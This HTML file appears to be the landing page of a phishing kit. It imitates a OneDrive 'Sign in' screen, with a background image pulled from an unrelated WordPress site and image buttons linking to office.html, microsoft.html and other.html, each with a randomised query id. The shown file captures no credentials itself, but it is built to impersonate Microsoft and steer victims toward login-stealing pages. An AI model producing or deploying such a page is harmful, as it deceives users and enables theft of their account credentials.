<!doctype html>
<html>
<head>
<title>Sign in -Onedrive</title>
</head>
<body>
<style type="text/css">
body{

    background: url('https://glsdjibouti.com/wp-content/uploads/3f4157ecd100ae3dc364b8fe29d52162.jpg') no-repeat fixed;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
}
fieldset {
    font-family: sans-serif;
width:220px;
height:730px;
 background:#232323;
 border: none;
padding: none;    
position: relative;
top:-10px;
right: 10px;
}
</style><fieldset
  <br><br><br><br><br><br><center>
  <img src="https://i.imgur.com/9XMr3s7.png"><br><br>
<a href="office.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/3PDjVLW.png"></a><br><br>
<a href="microsoft.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/gQJXcp1.png"></a><br><br>
<a href="other.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/gZdm3U5.png"></a><br><br><center>
</body>
</html>
